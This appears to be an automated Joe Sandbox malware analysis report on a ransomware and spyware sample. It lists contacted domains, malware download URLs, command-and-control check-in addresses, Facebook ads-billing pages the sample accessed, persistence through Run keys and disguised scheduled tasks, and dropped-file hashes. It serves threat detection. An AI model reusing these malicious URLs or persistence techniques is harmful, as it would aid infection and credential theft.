            162.0.217.254
            truefalse
              high
              flytourchip.com.br
              158.69.96.67
              truetrueunknown
              xv.yxzgamen.com
              188.114.97.3
              truefalse
                unknown
                iueg.aappatey.com
                45.66.159.142
                truefalse
                  unknown
                  www.facebook.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://flytourchip.com.br/systems/ChromeSetup.exetrue
                    • Avira URL Cloud: safe
                    unknown
                    http://perficut.at/tmp/true
                    • Avira URL Cloud: safe
                    unknown
                    http://potunulit.org/true
                    • URL Reputation: safe
                    unknown
                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingfalse
                      high
                      http://soryytlic4.net/true
                      • URL Reputation: safe
                      unknown
                      http://novanosa5org.org/true
                      • URL Reputation: safe
                      unknown
                      http://golilopaster.org/true
                      • URL Reputation: safe
                      unknown
                      http://bihsy.com/lancer/get.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://62.204.41.134/false
                      • Avira URL Cloud: safe
                      unknown
                      https://xv.yxzgamen.com/2701.htmltrue
                      • URL Reputation: malware
                      unknown
                      http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604false
                      • Avira URL Cloud: safe
                      unknown
                      http://bulimu55t.net/true
                      • URL Reputation: safe
                      unknown
                      https://xv.yxzgamen.com/logo.pngtrue
                      • URL Reputation: malware
                      unknown
                      https://api.2ip.ua/geo.jsonfalse
                        high
                        http://siaoheg.aappatey.com/check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f6false
                        • Avira URL Cloud: safe
                        unknown
                        http://iueg.aappatey.com/check/safefalse
                        • URL Reputation: safe
                        unknown
                        http://hujukui3.net/true
                        • URL Reputation: safe
                        unknown
                        https://www.facebook.com/ads/manager/account_settings/account_billingfalse
                          high
                          http://77.73.134.27/llpb1133.exetrue
                          • URL Reputation: malware
                          unknown
                          http://bukubuka1.net/true
                          • URL Reputation: safe
                          unknown
                          http://newzelannd66.org/true
                          • URL Reputation: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yX/l/en_US/WYC6LbamQUd.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e6044D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://siaoheg.aappatey.com/Kllpb1133.exe, 00000014.00000002.602167234.00000000004BA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/ac/?q=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://62.204.41.134/_D8D3.exe, 00000013.00000003.441885976.000000000085F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://messenger.com/98D7.exe, 00000010.00000003.474645572.0000000002892000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://search.yahoo.com?fr=crmas_sfpfD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.openssl.org/support/faq.html3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmpfalse
                                      high
                                      http://iueg.aappatey.com/check/safeXdkojlmpp98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://siaoheg.aappatey.com/r98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://static.xx.fbcdn.net/rsrc.php/v3/yR/r/n9ktzHPknGx.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://perficut.at/98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://siaoheg.aappatey.com/98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://siaoheg.aappatey.com:80/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28ef98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://iueg.aappatey.com/check/safeB98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/098D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://iueg.aappatey.com:80/check/safe98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://iueg.aappatey.com/m98D7.exe, 00000010.00000003.492565099.00000000004C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/4x04rJtLVMo.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.476889083.000000000288E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675preseMullpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/mkZZ0EnRB0x.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://iueg.aappatey.com/check/safei98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.303832836.000000000F270000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/ue_OWlkLDZP.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://perw.facebook.cueg.aappatey.com/check/safe98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675?llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://62.204.41.134/llD8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604oD8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604nD8D3.exe, 00000013.00000003.514324898.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.0000000000843000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://iueg.aappatey.com/check/safeT7-16b8-4llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcfBb4E498D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://siaoheg.aappatey.com/check/?sid=288019&key=8611a052d7ff506dc761df9a028c28efcohor98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/ym/r/2Z9gzYPL3TW.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ac.ecosia.org/autocomplete?q=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://search.yahoo.com?fr=crmas_sfpD8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/qu9vi-bmWl3.js?_nc_x=Ij3Wp8lg5Kz98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://siaoheg.aappatey.com/check/?sid=287855&key=53966fc5c1f009ecd22e4b74973b5675cllpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://iueg.aapp98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/098D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=D8D3.exe, 00000013.00000003.514197063.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    37.34.248.24
                                                                                    unknownKuwait
                                                                                    42961GPRS-ASZAINKWtrue
                                                                                    190.219.54.242
                                                                                    unknownPanama
                                                                                    18809CableOndaPAtrue
                                                                                    23.106.124.133
                                                                                    unknownSingapore
                                                                                    59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                    45.66.159.142
                                                                                    siaoheg.aappatey.comRussian Federation
                                                                                    18978ENZUINC-USfalse
                                                                                    62.204.41.134
                                                                                    unknownUnited Kingdom
                                                                                    30798TNNET-ASTNNetOyMainnetworkFIfalse
                                                                                    195.158.3.162
                                                                                    perficut.atUzbekistan
                                                                                    8193BRM-ASUZtrue
                                                                                    188.114.97.3
                                                                                    xv.yxzgamen.comEuropean Union
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    158.69.96.67
                                                                                    flytourchip.com.brCanada
                                                                                    16276OVHFRtrue
                                                                                    188.114.96.3
                                                                                    potunulit.orgEuropean Union
                                                                                    13335CLOUDFLARENETUStrue
                                                                                    77.73.134.27
                                                                                    unknownKazakhstan
                                                                                    206751FIBEROPTIXDEtrue
                                                                                    162.0.217.254
                                                                                    api.2ip.uaCanada
                                                                                    35893ACPCAfalse
                                                                                    157.240.253.35
                                                                                    star-mini.c10r.facebook.comUnited States
                                                                                    32934FACEBOOKUSfalse
                                                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                    Analysis ID:800784
                                                                                    Start date and time:2023-02-07 19:42:59 +01:00
                                                                                    Joe Sandbox Product:CloudBasic
                                                                                    Overall analysis duration:0h 13m 47s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:light
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                    Number of analysed new started processes analysed:41
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:2
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • HDC enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample file name:file.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.rans.troj.spyw.evad.winEXE@40/35@15/12
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 50%
                                                                                    HDC Information:
                                                                                    • Successful, ratio: 74.5% (good quality ratio 66.5%)
                                                                                    • Quality average: 67.2%
                                                                                    • Quality standard deviation: 33.7%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 0
                                                                                    • Number of non-executed functions: 0
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                    • TCP Packets have been reduced to 100
                                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, g.agametog.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                                                                                    • Execution Graph export aborted for target 4113.exe, PID 4968 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                    TimeTypeDescription
                                                                                    19:44:11API Interceptor759x Sleep call for process: explorer.exe modified
                                                                                    19:44:47Task SchedulerRun new task: Firefox Default Browser Agent 965BA40FEDD9AA3B path: C:\Users\user\AppData\Roaming\sievwvt
                                                                                    19:45:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
                                                                                    19:45:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
                                                                                    19:45:28Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe s>--Task
                                                                                    19:45:41API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                    19:45:44API Interceptor9x Sleep call for process: 98D7.exe modified
                                                                                    19:45:47API Interceptor4x Sleep call for process: pliu.exe modified
                                                                                    19:45:55Task SchedulerRun new task: Firefox Default Browser Agent 71F89663E6ACBAD9 path: C:\Users\user\AppData\Roaming\jhevwvt
                                                                                    19:46:06API Interceptor4x Sleep call for process: llpb1133.exe modified
                                                                                    19:46:44Task SchedulerRun new task: NoteUpdateTaskMachineQC path: C:\Program Files\Notepad\Chrome\updater.exe
                                                                                    No context
                                                                                    No context
                                                                                    No context
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):65536
                                                                                    Entropy (8bit):0.8209235901306622
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:f/FTVYCR+kHPwglog7Ro6tpXIQcQ3c6dglcEpcw3b+HbHg/8BRTf3Oy1E/8Ih4lj:nBVYCRj7HZ2T0jum/u7sdS274ItL7
                                                                                    MD5:2ED88DB7DBCF47D1AA71578074509CBC
                                                                                    SHA1:30D162AC4C2E9AE2B4730A708874254C6271B007
                                                                                    SHA-256:7ED6039C52041360F4D1C253032180C38FA328404C538C2C1CF787BBAE4C4B9E
                                                                                    SHA-512:78AC1D5FDD78133BAFF9496A808ABDC7AEBE0D409F8412462A1EB0CA2DBA2B9628D1979933277D70CD4CEC31CCFDBB99A89D810BC56D1AC0AAE6C09070F33CF4
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.0.3.0.1.5.2.0.0.1.3.5.8.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.0.3.0.1.5.2.1.8.7.2.9.0.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.9.5.1.2.f.c.-.9.5.6.2.-.4.2.5.c.-.b.8.5.8.-.f.4.6.7.d.4.2.4.6.8.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.0.3.4.2.4.5.-.e.6.7.2.-.4.6.c.0.-.b.f.1.c.-.d.4.6.6.6.8.9.d.0.2.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.C.F.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.e.4.-.0.0.0.1.-.0.0.1.f.-.9.3.7.9.-.1.8.b.b.6.f.3.b.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.2.0.c.5.0.f.0.3.9.1.d.5.5.0.9.0.c.7.9.1.3.e.2.9.0.f.1.6.4.9.0.0.0.0.0.a.0.4.!.0.0.0.0.6.c.8.5.2.2.a.c.5.4.5.4.4.2.f.2.9.b.6.a.5.a.7.6.8.f.a.9.f.0.f.c.4.a.3.8.a.9.2.8.!.E.C.F.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.1.2././.2.3.:.
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Mini DuMP crash report, 14 streams, Wed Feb 8 03:45:20 2023, 0x1205a4 type
                                                                                    Category:dropped
                                                                                    Size (bytes):42908
                                                                                    Entropy (8bit):2.0291098699015357
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:9kmpyWzYOQzfvGiSUJC+KAA2ygIw+HKRME:TLQPFKAA2ynqqE
                                                                                    MD5:9454AA6B755A43C9F67DFBFAA593A755
                                                                                    SHA1:1468E2C56D4BABE46A264FE008F93E520A0B1928
                                                                                    SHA-256:EF8FF51F45A650DEBCC57AE98329F175AEC73134F11A0E1474ABF07548F1D183
                                                                                    SHA-512:ECC70BE077A376D1236199CFD6D494A1524B8A628346E1DB6E8014AAF0998A0B0CF3CEB5C02A365ADC47BC255DEF5A05FD4F06F8777648B07011F61A3694D303
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:MDMP....... ..........c.........................................(..........T.......8...........T...........................................................................................................U...........B......h.......GenuineIntelW...........T..............c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8380
                                                                                    Entropy (8bit):3.699783088515253
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Rrl7r3GLNilN6g6YqUSU9sgmf1SmCCpD689bT1sfBxm:RrlsNi/6g6YpSU9sgmf1SgTOfG
                                                                                    MD5:96506463F75BA6FD08E77B5ED03E6B87
                                                                                    SHA1:11D1C5E86BDF69AFB1A84F55F96A1B470519B986
                                                                                    SHA-256:AD62DA7A69B466F94CEF6F3B56EBB83CC604640BEF37A2F08713EA4EE0ABE2B9
                                                                                    SHA-512:CEA6031B4C78ABF269C667EB4F1CAF5C48AF2529E6887E088459496FF7F732D64283ACB5B9ACA0636EEE841B446DD94107F23BD023C52C9E9D2616DE2EB35D81
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.9.6.<./.P.i.d.>.........
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4678
                                                                                    Entropy (8bit):4.469696494300214
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cvIwSD8zslJgtWI97jWgc8sqYjj8fm8M4JASF7+q8vP2yD/d:uITf/ESgrsqYMJzKOyD/d
